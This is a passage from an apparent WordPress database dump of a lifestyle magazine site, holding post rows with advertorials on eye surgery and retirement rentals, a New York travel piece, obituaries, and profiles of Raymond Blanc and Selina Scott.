eye.</p>&#13;\n<p>Patricia had Light Adjustable Lens surgery at the London Eye Hospital, and was delighted by the results.  It was performed by Mr Qureshi, BSc MBBS FRCS (Ophth.), consultant ophthalmic surgeon and medical director at The London Eye Hospital. “Not only was my procedure a complete success, but Mr Qureshi was an absolute pleasure to work with,” Patricia says. “He always took the time to explain everything, and was never in a rush. I now have the best vision that I’ve ever had. It’s amazing how sharp and colourful everything looks.”</p>&#13;\n<div>&#13;\n<p></p><div class=\"woo-sc-hr\"></div> &#13;\n<p><em>+44 20 7060 2602</em><br /><em> <a href=\"http://www.londoneyehospital.com/\" target=\"_blank\">www.londoneyehospital.com</a></em></p>&#13;\n</div>&#13;\n									</div>','Pioneering surgery offering the gift of sight','A safer, more effective alternative to cataract removal Millions of British people can look forward to a lifetime of better sight thanks to a revolutionary','publish','open','open','','pioneering-surgery-offering-the-gift-of-sight','','','2018-04-02 20:03:16','2018-04-02 20:03:16','',0,'http://westonspirit.org.uk/pioneering-surgery-offering-the-gift-of-sight.asp',0,'post','',0),(292,1,'2016-04-18 05:39:55','2016-04-18 05:39:55','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">31 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The city that never sleeps: New York in 48 hours\" st_url=\"http://westonspirit.org.uk/2013/10/the-city-that-never-sleeps-new-york-in-48-hours/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The city that never sleeps: New York in 48 hours\" st_url=\"http://westonspirit.org.uk/2013/10/the-city-that-never-sleeps-new-york-in-48-hours/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The city that never sleeps: New York in 48 hours\" st_url=\"http://westonspirit.org.uk/2013/10/the-city-that-never-sleeps-new-york-in-48-hours/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The city that never sleeps: New York in 48 hours\" st_url=\"http://westonspirit.org.uk/2013/10/the-city-that-never-sleeps-new-york-in-48-hours/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The city that never sleeps: New York in 48 hours\" st_url=\"http://westonspirit.org.uk/2013/10/the-city-that-never-sleeps-new-york-in-48-hours/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><strong>The must-see list for New York first timers is vast: Times Square, the Statue of Liberty, the Empire State Building, Fifth Avenue – the list goes on. So having visited NYC more than a few times, I decided in my 48 hours in the city that never sleeps I would skip the most obvious tourist attractions to head to places off the beaten track.<span id=\"more-3419\"></span></strong></p>&#13;\n<p><img class=\"size-full wp-image-3420 alignnone\" title=\"New York2\" src=\"/wp-content/uploads/2013/10/New-York2.jpg\" alt=\"\" width=\"596\" height=\"335\" srcset=\"../../../wp-content/uploads/2013/10/New-York2.jpg 596w\" sizes=\"(max-width: 596px) 100vw596px\" /></p>&#13;\n<p>As tour guide, I enlisted my friend Lauren, born and raised in New York and who now lives in the trendy West Village, Manhattan. Together, we set out to tackle as many of the more obscure sights as possible, with the haste for which New Yorkers are famous.</p>&#13;\n<p>Bright and early on my first morning, we went for a brisk walk to the High Line, a one-mile linear park built on a disused elevated railway line in the Chelsea and Meatpacking districts. Redesigned and planted as an aerial greenway, the High Line was inspired by the Promenade Plantée in Paris, a public park that follows the old Vincennes railway. Boasting spectacular views of the Hudson River and city skyline, the High Line even has lounge chairs set out along the edge of the path for visitors to use. Lauren and I stopped at a couple to admire the view and soak up some morning sunshine.</p>&#13;\n<p>Hungry for lunch, we headed for Chelsea Market, once the headquarters of the National Biscuit Company in the 1890s. A long indoor arcade now filled with restaurants, pop-up food stalls and craft stores, Chelsea Market looks a bit like an antiquated theme park and evokes a lost industrial culture.</p>&#13;\n<p><img class=\"alignright  wp-image-3421\" title=\"New York\" src=\"/wp-content/uploads/2013/10/New-York.jpg\" alt=\"\" width=\"251\" height=\"378\" srcset=\"../../../wp-content/uploads/2013/10/New-York.jpg 596w\" sizes=\"(max-width: 251px) 100vw251px\" />Wanting to do a bit of shopping after lunch, but opting to forgo the crowded stores on Fifth Avenue, we ambled back to the West Village – once the centre of beatnik culture, but now one of the chicest parts of town. Featuring quaint cobblestone streets and elegant brownstone townhouses, it’s home to countless vintage stores and boutiques. On our way back, we stopped at the historic Jefferson Market Courthouse, a lovely building in Venetian Gothic style. Formerly the site of a women’s detention centre, it now serves as a branch library.</p>&#13;\n<p>That evening we stayed in the West Village for dinner, an area also widely known for its diverse cuisine. We dined at a small, charming, contemporary American restaurant called Annisa, which means “women” in Arabic. Combining both Asian and French cooking techniques, the food was exquisite. In homage to its name, Annisa’s wine list is comprised of wine produced solely by female vintners.</p>&#13;\n<p>The next morning we were off to the northern edge of Manhattan to visit The Cloisters, a branch of the Metropolitan Museum of Art (MMA) dedicated to the art and architecture of medieval Europe. Set in Fort Tryon Park, the museum and its garden offer breathtaking views of downtown Manhattan; inside is a collection of approximately 3,000 works of art dating from the ninth to the 16th centuries.</p>&#13;\n<p>That afternoon we ventured to what <em>GQ</em> calls the “coolest city on the planet”, Brooklyn. After stopping for a slice of New York pizza (folded in half, in true New Yorker fashion), we walked across the Brooklyn Bridge, taking in famous sites such as the Statue of Liberty and Governors Island on either side.</p>&#13;\n<p>After two jam-packed days, I finally understood why New York is called the city that never sleeps. Needless to say, I slept the entire way home to London.</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<p><strong>Nina Reschovsky</strong></p>&#13;\n									</div>','The city that never sleeps: New York in 48 hours','The must-see list for New York first timers is vast: Times Square, the Statue of Liberty, the Empire State Building, Fifth Avenue – the list goes on. So having','publish','open','open','','the-city-that-never-sleeps-new-york-in-48-hours','','','2018-04-02 20:03:14','2018-04-02 20:03:14','',0,'http://westonspirit.org.uk/the-city-that-never-sleeps-new-york-in-48-hours.asp',0,'post','',0),(294,1,'2018-03-02 15:06:09','2018-03-02 15:06:09','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">27 October 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"You can own your future\" st_url=\"http://westonspirit.org.uk/2013/10/you-can-own-your-future/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"You can own your future\" st_url=\"http://westonspirit.org.uk/2013/10/you-can-own-your-future/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"You can own your future\" st_url=\"http://westonspirit.org.uk/2013/10/you-can-own-your-future/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"You can own your future\" st_url=\"http://westonspirit.org.uk/2013/10/you-can-own-your-future/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"You can own your future\" st_url=\"http://westonspirit.org.uk/2013/10/you-can-own-your-future/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<p><strong>It’s time to wake up to the benefits of renting a property<span id=\"more-3374\"></span></strong></p>&#13;\n<p><img class=\"size-full wp-image-3375 alignnone\" title=\"Hawthorns\" src=\"/wp-content/uploads/2013/10/Hawthorns.jpg\" alt=\"\" width=\"596\" height=\"447\" /></p>&#13;\n<p>Finding a practical solution that matches the quality of your retirement living dream may be easier said than done – and renting may not automatically spring to the top of your list of possible solutions.</p>&#13;\n<p>However, increasing numbers of UK retirees are discovering what their counterparts in America and Australia found out a few years back – that renting your retirement home offers many advantages over continued property ownership.</p>&#13;\n<p>Even more are discovering how you can continue to benefit from both.Hawthorns Retirement has brought its highly successful American formula for retirement living to the UK at Eastbourne, Clevedon and Braintree.</p>&#13;\n<p><strong>A flexible lifestyle</strong></p>&#13;\n<p>These developments, in a nutshell, offer you continued independent living, none of the worries of home ownership and total flexibility to change your lifestyle at a month’s notice should circumstances dictate. And all this is achieved by renting your retirement home at The Hawthorns.</p>&#13;\n<p>Your monthly rental includes all your many monthly expenses including all your meals and snacks, utility bills, housekeeping, maintenance – even a free minibus to take you to the shops and back. If you sit down and calculate what you are spending on all those items living in your own home, the rental fees appear very reasonable indeed.</p>&#13;\n<p>As well as the financial argument, life at The Hawthorns offers the added benefits of security, companionship and the flexibility of handing in just one month’s notice of your decision to leave.</p>&#13;\n<p>While many residents fund this idyllic retirement lifestyle from the proceeds of the sale of their home, many others opt to rent out their own property and fund their new-found lifestyle from the rental income, maintaining their property as part of their estate.</p>&#13;\n<p>For Alan and Jean Ward, the decision to move to The Hawthorns in Braintree was swift in the extreme. They saw an advert for the development in a paper on a Sunday morning, visited in the afternoon and signed on the dotted line the next day following a second visit.</p>&#13;\n<p><strong>Quick decision</strong></p>&#13;\n<p>Their decision to rent out their existing property rather than sell it was almost as quick, as Alan explains.</p>&#13;\n<p>“Jean has Parkinson’s, I suffer with arthritis and the thought of not having to worry about shopping, cooking and all the other home maintenance chores suddenly sounded so appealing. We loved The Hawthorns the moment we stepped inside so it was an easy as well as swift decision.</p>&#13;\n<p>“I have to admit my initial thought was to sell our own home, a three-bedroom detached bungalow in Tiptree, but after a chat with our son we realised it made more sense to rent out our bungalow. The rental income from that subsidises our rent at The Hawthorns and enables us to enjoy not only a fabulous but an affordable lifestyle.</p>&#13;\n<p>“Of course, it makes complete sense at the moment to rent out the bungalow. With the housing market in the doldrums, I can wait two or three years for prices to pick up and then consider selling it and getting much more capital for it – very appealing.</p>&#13;\n<p>“What’s more, we always know we still have our old home should we ever wish to return to it – which I have to say is highly unlikely, the way we feel about life here,” said Alan.</p>&#13;\n<p><span style=\"text-decoration: underline;\"><div class=\"woo-sc-hr\"></div></span></p>&#13;\n<div>&#13;\n<p><em>0800 077 4656</em><br /><em> <a href=\"http://www.hawthornsretirement.co.uk/\" target=\"_blank\">www.hawthornsretirement.co.uk</a></em></p>&#13;\n</div>&#13;\n									</div>','You can own your future','It’s time to wake up to the benefits of renting a property Finding a practical solution that matches the quality of your retirement living dream may be','publish','open','open','','you-can-own-your-future','','','2018-04-02 20:03:12','2018-04-02 20:03:12','',0,'http://westonspirit.org.uk/you-can-own-your-future.asp',0,'post','',0),(295,1,'2015-04-23 15:46:43','2015-04-23 15:46:43','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 November 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Obituaries\" st_url=\"http://westonspirit.org.uk/2013/11/obituaries/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Obituaries\" st_url=\"http://westonspirit.org.uk/2013/11/obituaries/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Obituaries\" st_url=\"http://westonspirit.org.uk/2013/11/obituaries/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Obituaries\" st_url=\"http://westonspirit.org.uk/2013/11/obituaries/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Obituaries\" st_url=\"http://westonspirit.org.uk/2013/11/obituaries/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><strong>Remembering and celebrating the lives of those who have recently passed away.<span id=\"more-3427\"></span></strong></p>&#13;\n<p>Cliff Morgan, who has died aged 83, put some of his extraordinary rugby ability down to playing in his youth for Coedely Coke Ovens XV in South Wales. “Before the game we had to drive a herd of cows from the pitch. There was little we could do about the cow pats so that is how we learned to swerve and sidestep. Those who failed to develop these skills smelled horribly for weeks.” Many years later when Morgan, pictured, was in Hollywood with actor Richard Burton, the pair astonished staff at the Beverly Hills Hilton by ordering egg and chips, twice.</p>&#13;\n<p>Alan Whicker, who has died aged 87, and traversed the globe “at least 97 times” was once voted the most envied man in Britain. He listed “reading airline timetables” among his interests and once caused a stir by saying that if he could take only six objects to a desert island he would choose “two blondes, two brunettes and two redheads”. When he was offered a cameo in a 1999 film, Whicker was asked by the costume department what he had worn in the 1970s. “You’re looking at it,” he replied.</p>&#13;\n<p>In 1962 Sir David Frost, who has died aged 74, was seen by Ned Sherrin doing an impersonation of Prime Minister Harold Macmillan at the Blue Angel in Upper Berkeley Street. Sherrin, who was looking for a linkman for That Was The Week That Was, decided Frost was the man to bring satire to late-night TV, and signed him up on the spot.</p>&#13;\n<p>Squadron Leader Peter Tunstall, who has died aged 94, spent longer in solitary confinement than any other Allied PoW and was court-martialled by the Germans five times. After he was captured in 1940 and a German officer told him that his war was over, he replied: “It damn well is not.” He later explained: “As far as I was concerned, a different type of war had started. My first duty was to escape, my second was to be as big a bloody nuisance as possible to the enemy.”</p>&#13;\n<p>Ray Manzarek, keyboardist with The Doors, who has died aged 74, recalled meeting lead singer Jim Morrison in 1965. “I’m sitting on the beach wondering what I’m going to do with myself. Who comes walking down but James Douglas Morrison? I said: �?Tell me what’s going on?’ And he said: �?Well, I’ve been living on a rooftop consuming a bit of LSD, and writing songs.’ And I said: �?Whoa, writing songs. OK, man, cool, like sing me a song.’</p>&#13;\n<p>“And so he sat down and began to sing. And I said: �?Man, this is incredible. Let’s get a rock and roll band together.’ And he said: �?That’s exactly what I want to do.’ And I said: �?All right, man, but what do we call the band?’ He said: �?We’re going to call it The Doors.’ And I said: �?You mean like the doors of perception; the doors in your mind?’ He said: �?No, no. Just The Doors.’ That was it. We were The Doors.”</p>&#13;\n<p>Wrestler Mick McManus, who has died aged 93, developed a lasting rivalry with Jackie Pallo, often played out in bouts on FA Cup Final day in the Sixties which, according to some, drew more viewers than the football. Each man had a weakness: Pallo hated being pulled by his ponytail; McManus would beg: <br /> “Not the ears, not the ears.”</p>&#13;\n<p>Eddie Braben, Morecambe and Wise’s television scriptwriter during their golden period at the BBC between 1968 and 1978, was the man behind their hugely popular Christmas shows, which became more demanding each year.</p>&#13;\n<p>As Braben, who has died aged 82, once explained: “The Morecambe And Wise Show became more important than Christmas. The real pressure came when I was sat in front of that typewriter with all those blank pages and nothing happening. That’s when you realised there were 20 or 25 million people looking over your shoulder – all saying �?Make me laugh’.”</p>&#13;\n									</div>','Obituaries','Remembering and celebrating the lives of those who have recently passed away. Cliff Morgan, who has died aged 83, put some of his extraordinary rugby ability','publish','open','open','','obituaries','','','2018-04-02 20:03:11','2018-04-02 20:03:11','',0,'http://westonspirit.org.uk/obituaries.asp',0,'post','',0),(296,1,'2014-06-27 06:22:11','2014-06-27 06:22:11','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 November 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Raymond Blanc: You can’t separate food from life\" st_url=\"http://westonspirit.org.uk/2013/11/raymond-blanc-you-cant-separate-food-from-life/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Raymond Blanc: You can’t separate food from life\" st_url=\"http://westonspirit.org.uk/2013/11/raymond-blanc-you-cant-separate-food-from-life/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Raymond Blanc: You can’t separate food from life\" st_url=\"http://westonspirit.org.uk/2013/11/raymond-blanc-you-cant-separate-food-from-life/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Raymond Blanc: You can’t separate food from life\" st_url=\"http://westonspirit.org.uk/2013/11/raymond-blanc-you-cant-separate-food-from-life/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Raymond Blanc: You can’t separate food from life\" st_url=\"http://westonspirit.org.uk/2013/11/raymond-blanc-you-cant-separate-food-from-life/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><strong>Strolling through the expansive vegetable garden at Le Manoir aux Quat’ Saisons, French chef Raymond Blanc beams under the Oxfordshire morning sun.<span id=\"more-3430\"></span></strong></p>&#13;\n<p><img class=\"size-full wp-image-3431 alignnone\" title=\"Raymond Blanc cookery school. Picture date 01/07/2013\" src=\"/wp-content/uploads/2013/10/Raymond.jpg\" alt=\"\" width=\"596\" height=\"397\" srcset=\"../../../wp-content/uploads/2013/10/Raymond.jpg 596w\" sizes=\"(max-width: 596px) 100vw596px\" /></p>&#13;\n<p>Chatting with his gardeners, stopping to taste-test some freshly picked radishes, and grumbling about “bloody rabbits” eating his crops, Blanc clearly feels right at home at his trademark luxury manor hotel, which houses his two-Michelin-star restaurant and cookery school.</p>&#13;\n<p>“Our cookery school was opened 22 years ago, and I pass on knowledge that my maman passed on to me, that was taught by her own parents and grandparents, and so on,” Blanc explains enthusiastically as he sips coffee on the lawn.</p>&#13;\n<p>“We had an expression about food – that it be delicious at all times, with seasonality and purity of ingredients, and to love always when she prepared a meal… that philosophy is the cornerstone of what we have done here.”</p>&#13;\n<p>For years Blanc has been an advocate for healthy eating, hoping to influence British people with his simple cooking techniquesand fight our high levels of cardiovascular disease, diabetes and obesity.</p>&#13;\n<p>“We can change this, just like that!” he exclaims, snapping his fingers.</p>&#13;\n<p><img class=\"size-full wp-image-3432 alignnone\" title=\"Raymond Blanc cookery school. Picture date 01/07/2013\" src=\"/wp-content/uploads/2013/10/Bernard2.jpg\" alt=\"\" width=\"596\" height=\"397\" srcset=\"../../../wp-content/uploads/2013/10/Bernard2.jpg 596w\" sizes=\"(max-width: 596px) 100vw596px\" /></p>&#13;\n<p>The Blanc Vite cookery class, taught by head tutor Mark Peregrine, specialises in quick, simple meals with fresh ingredients, and has been one of the many platforms on which Blanc demonstrates the value of good food, the basics of good nutrition, and the importance of seasonality.</p>&#13;\n<p>“The course is fun, and Mark is a wonderful teacher. The moment we have a carrot, you know everything about that carrot, which shop or farm it’s come from, which variety, which climate suits it best, how to grow it,” says Blanc. “Then we discuss how to cut it – should we peel it or not? The texture is important, both in taste and nutrients and how long you should cook it, so you see, that carrot takes on a whole life of its own.”</p>&#13;\n<p>To Blanc, “seasonality” is still the most clichéd, yet important, subject, and the most misunderstood, though to him it translates as “close to home”.</p>&#13;\n<p>“The closer to home the better it is – less travel, of course, less pollution. Then of course it’s fresh, it’s in season, and if it’s in season there’s a lot of it. It’s less expensive, better taste, better colour, better nutrients!”</p>&#13;\n<p>Hoping to pass on this message to younger generations, Blanc encourages readers to practise good nutrition and experience the joy of cooking, while passing on those messages to our children, as we start to slowly become more open to his ideas. Blanc wants people to remember that food, along with sustenance, represents celebration, joy and bonding.</p>&#13;\n<p>“Twenty years ago, I had to fight so hard here,” he explains. “English gentlemen would sit at the edge of their seat, eat their soup in a funny way and they would talk about the weather. So the first thing I did was to kill this habit at the table to create joy, because how can you have joy in a straitjacket? You cannot! You have pain.”</p>&#13;\n<p><img class=\"size-full wp-image-3433 alignnone\" title=\"Raymond Blanc cookery school. Picture date 01/07/2013\" src=\"/wp-content/uploads/2013/10/Bernard3.jpg\" alt=\"\" width=\"596\" height=\"397\" srcset=\"../../../wp-content/uploads/2013/10/Bernard3.jpg 596w\" sizes=\"(max-width: 596px) 100vw596px\" /></p>&#13;\n<p>Blanc feels the greatest mistake we’ve made in Britain is to separate food from life, reducing it to a mere commodity whose only virtue is cheapness, leading to health problems, loss of true craft, and food scandals.</p>&#13;\n<p>“I’ve really seen that food has sparked the British consciousness more and more – the consumer has had enough and wants to reconnect with food, with truth and authenticity, and the chefs now as well, at last! Young chefs are connecting with the true values of gastronomy.”</p>&#13;\n<p>Blanc also embraces molecular gastronomy, a sub-discipline of food science that aims to explore what physical and chemical impact food has and how this changes with the cooking process.</p>&#13;\n<p>Studying in his late twenties, under Oxford physicist Nicholas Kurti, Blanc became the first chef to champion the more scientific consideration towards food and nutrition, which he delves into further with his latest BBC series <em>How To Cook Well</em>.</p>&#13;\n<p>Though most UK citizens are creatures of habit, enjoying only around seven or eight routine meals, Blanc says experimenting with simple meals can improve health and bring families together. “Maybe not every day but once a week, together as a family, cook a meal together. One is cooking, the other is peeling, and then as a family you cook a simple Sunday meal. And of course if kids are around, just make them participate in the cooking, they love stirring up the pot, tasting a bit of this and that. It’s great fun for them,” advises Blanc.</p>&#13;\n<p>“That’s how they will learn, with fun, not taking it too seriously. I have eaten so many humble pies, really, how can one be serious? When I first started teaching children, I wanted a school that would be about fun and the celebration of food… because food is love.”</p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<p><strong>Bonnie Gardiner</strong></p>&#13;\n									</div>','Raymond Blanc: You can’t separate food from life','Strolling through the expansive vegetable garden at Le Manoir aux Quat’ Saisons, French chef Raymond Blanc beams under the Oxfordshire morning sun. Chatting','publish','open','open','','raymond-blanc-you-cant-separate-food-from-life','','','2018-04-02 20:03:09','2018-04-02 20:03:09','',0,'http://westonspirit.org.uk/raymond-blanc-you-cant-separate-food-from-life.asp',0,'post','',0),(297,1,'2014-12-19 14:51:53','2014-12-19 14:51:53','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">1 November 2018</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Selina Scott: I would rather die on my feet than live on my knees\" st_url=\"http://westonspirit.org.uk/2013/11/selina-scotti-would-rather-die-on-my-feet-than-live-on-my-knees/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Selina Scott: I would rather die on my feet than live on my knees\" st_url=\"http://westonspirit.org.uk/2013/11/selina-scotti-would-rather-die-on-my-feet-than-live-on-my-knees/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Selina Scott: I would rather die on my feet than live on my knees\" st_url=\"http://westonspirit.org.uk/2013/11/selina-scotti-would-rather-die-on-my-feet-than-live-on-my-knees/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Selina Scott: I would rather die on my feet than live on my knees\" st_url=\"http://westonspirit.org.uk/2013/11/selina-scotti-would-rather-die-on-my-feet-than-live-on-my-knees/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Selina Scott: I would rather die on my feet than live on my knees\" st_url=\"http://westonspirit.org.uk/2013/11/selina-scotti-would-rather-die-on-my-feet-than-live-on-my-knees/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><strong>Selina Scott on Princess Diana, walking her dogs – and why too many TV executives are still living in the Dark Ages<span id=\"more-3436\"></span></strong></p>&#13;\n<p><img class=\"size-full wp-image-3437 alignnone\" title=\"Royalty - Princess of Wales visits ITN - London\" src=\"/wp-content/uploads/2013/10/Selina-Scott2.jpg\" alt=\"\" width=\"596\" height=\"440\" srcset=\"../../../wp-content/uploads/2013/10/Selina-Scott2.jpg 596w\" sizes=\"(max-width: 596px) 100vw596px\" /></p>&#13;\n<p>Once, when Selina Scott was the anchor of News at Ten, she escorted Diana, Princess of Wales, who she knew a bit, on a royal visit around the testosterone-charged offices of ITN.</p>&#13;\n<p>Not many women worked in media newsrooms in those days, whether television or newspaper, and as they <br /> were leaving Diana, always flirtatious, glanced one last time at the ranks of laddish reporters, uncompromising sub-editors and mannish executives and cheekily asked: “Selina, which one is your boyfriend?”</p>&#13;\n<p>What was recorded in the privacy of the elevator taking the two out of the building was lost in a gale of girlish giggles, but this exchange was duly reported in the papers confirming Selina’s image, which she came to hate, as “The Golden Girl of Television”.</p>&#13;\n<p>But the papers missed a more meaningful aside by Diana to Selina when they both attended a gala at the Royal Albert Hall. Selina recalls: “Diana said a little coyly to me, ‘People say you look like me’.”</p>&#13;\n<p>Not an unnatural observation as they were both blondes, and attractive young women; very much, in their different ways, media darlings of the moment.</p>&#13;\n<p><img class=\"alignright  wp-image-3438\" title=\"Classical Brit Awards, Royal Albert Hall, London, Britain - 02 Oct 2013\" src=\"/wp-content/uploads/2013/10/Selina-Scott.jpg\" alt=\"\" width=\"322\" height=\"453\" srcset=\"../../../wp-content/uploads/2013/10/Selina-Scott.jpg 596w\" sizes=\"(max-width: 322px) 100vw322px\" />Selina’s reply was instructive. “I said to Diana, ‘Well, I was here first’.” Meaning that, as the more senior of the two, it was a case, if anything, that Diana looked like Selina, not the other way round. It was in its way a breath-taking declaration of Selina’s independent state of mind and quite a break from the servile manner in which commoners are supposed to speak to royalty. Not that Diana minded. She laughed. It was another bit of fun to her.</p>&#13;\n<p>For most of her career Selina camouflaged this feisty personality behind glamorous model-girl looks and that mellifluous voice with its flute-like allure that seduced many an on-camera interviewee into surrendering confidences. Prince Andrew was so besotted when she was hosting the evening chat-show <em>Wogan</em> on the BBC back in the Eighties he asked on air for her telephone number.</p>&#13;\n<p>So it was thought-provoking that when the Corporation was being attacked for outdated, ageist, sexist attitudes to women presenters, chucking seasoned professionals overboard in favour of autocue-dependent bimbos, Education Minister Michael Gove sparked a provocative debate when he said he would rather watch Selina Scott than Holly Willoughby.</p>&#13;\n<p>In a way this debate crystallised the metamorphosis of Scott from luscious if seemingly passive beauty to fearless iconoclast. In recent years she has become not only an agitator at the barricades of social change but ironically cast into conflict with the very industry that made her a national figure.</p>&#13;\n<p>For her pains she has been rubbished by television bosses who wished she would stop throwing a searchlight on the iniquities of the broadcasting world, as well as lickspittle scribblers in the press, and advised that her frequent attacks are no help to her television career, where presenters with controversial, outspoken views are often treated as lepers. Indeed that old gargoyle, late film director Michael Winner, compared her to one of the witches in <em>Macbeth</em>!</p>&#13;\n<p>Selina was “radicalised”, as it were, five years ago, when she sued Channel 5 for breach of contract after they offered her a job which they later reneged on. She won an apology and damages of £250,000.</p>&#13;\n<p>Selina says: “I was told if I went ahead with the action I would be contaminated and nobody would hire me. But I would rather die on my feet than live on my knees. It was the kind of rejection I had suffered at the hands of both the BBC and ITV over the years.</p>&#13;\n<p>“I and others like me have experienced a disregarding, casual maiming which leaves women with their confidence and careers in tatters but which is done in a sly, almost Machiavellian way. It seems to be conducted by whispers in corridors. It is insidious, cowardly and unworthy of the great traditions of British broadcasting, which has a duty to reflect the way society is, not the <em>Stepford Wives</em> version of it. They used to say at the BBC that when a woman’s age exceeds her bra size she is history. And it was true.”</p>&#13;\n<p>Women everywhere found an echo of this in their own lives, and wrote to Selina by the sackload supporting her stand. Her campaign ignited a groundswell of opinion which now increasingly sees more women being given responsible on-air presenter roles on serious programmes, making them role models to younger generations.</p>&#13;\n<p>The irony is that, despite her new revolutionary image, and at an age when many former female telly stars of her generation are willing to settle for comfortable daytime TV, the work continues to pour in. She was recently offered more than £100,000 to appear in the next series of <em>I’m A Celebrity… Get Me Out Of Here!</em>, has just been seen on ITV guest presenting the Classical Brits, and appears next month in a week’s episodes of <em>Countdown</em>.</p>&#13;\n<p>Her show <em>Treasure Houses</em>, a glossy 3D series about the great stately homes of England, reruns on Sky and her book about Majorca, where she has a holiday home, continues to sell well for HarperCollins. “I think my most stimulating time was when I worked for one of the big networks in America,” she says. “I went undercover on one assignment to report on the killing of elephants for their tusks in Africa, which led to a world ban on ivory sales. This was back in the Eighties when we didn’t really know this was happening. The poaching nightmare hadn’t been reported. It’s my regret that this kind of programme, which was broadcast coast-to-coast in the States, was not seen in the UK. I think it would have changed perceptions about me.”</p>&#13;\n<p>Blessed with phenomenal energy, she has in recent years poured her vitality into a parallel career as a successful businesswoman, providing socks and other woollen garments to celebrities and public alike from the adored Angora goat herd on her 200-acre farm in the old North Riding of Yorkshire. When Prince Charles stalks stags on the Scottish moors it is always in Selina’s socks. She has also found time to become a Doctor of Letters at Hull University.</p>&#13;\n<p>Today the fresh, country-girl looks have matured into the kind of senior beauty that drives Frenchmen mad. Think of a younger Catherine Deneuve. Selina’s outdoor life has given her such a glow of health it makes you think she could take on Jessica Ennis. She’s so fit she was even offered a Playtex bra commercial recently, quite a compliment for a 60-year-old!</p>&#13;\n<p>Like Emily Brontë she can be seen most days striding across the Yorkshire moors, with her two dogs Nip and Kiki racing ahead.</p>&#13;\n<p>She says: “I’ve planted woods, built a lake, conserved hedgerows, protected bird life, salvaged an ancient wall and rugby-tackled my goats when they don’t behave themselves. I’m up at dawn and physically on the go all day. It’s kept me fit. I never have to go near a gym and I sleep like a log. I’ve reached an age when I know myself. I don’t have to settle for second best.”</p>&#13;\n<p>Earlier this month, Selina starred at the Classical Brit Awards at the Royal Albert Hall, where she outshone Myleene Klass in a stunning black gown covered in diamantes by Catherine Walker. The photographers, as always, went crazy when she appeared on the red carpet looking fabulous. They know it’s where she belongs.</p>&#13;\n<p><a href=\"http://www.selinascott.com/\" target=\"_blank\"><em><span style=\"text-decoration: underline;\">www.selinascott.com</span></em></a></p>&#13;\n<div class=\"woo-sc-hr\"></div>&#13;\n<p><strong>Roderick Gilchrist</strong></p>&#13;\n									</div>','Selina Scott: I would rather die on my feet than live on my knees','Selina Scott on Princess Diana, walking her dogs – and why too many TV executives are still living in the Dark Ages Once, when Selina Scott was the anchor of','publish','open','open','','selina-scott-i-would-rather-die-on-my-feet-than-live-on-my-knees','','','2018-04-02 20:03:06','2018-04-02 20:03:06','',0,'http://westonspirit.org.uk/selina-scott-i-would-rather-die-on-my-feet-than-live-on-my-knees.asp',0,'post','',0),(577,1,'2018-07-04 09:29:39','2018-07-04 09:29:39','<div class=\"column grid16 left first\">\r\n<div class=\"contents\">\r\n<div>\r\n<h2><a href=\"/\"><img class=\"alignnone wp-image-405\" src=\"http://www.westonspirit.org.uk/wp-content/uploads/2018/04/base-coat-beauty_4460x4460-1024x683.jpg\" alt=\"beauty treatments London\" width=\"1000\" height=\"667\" 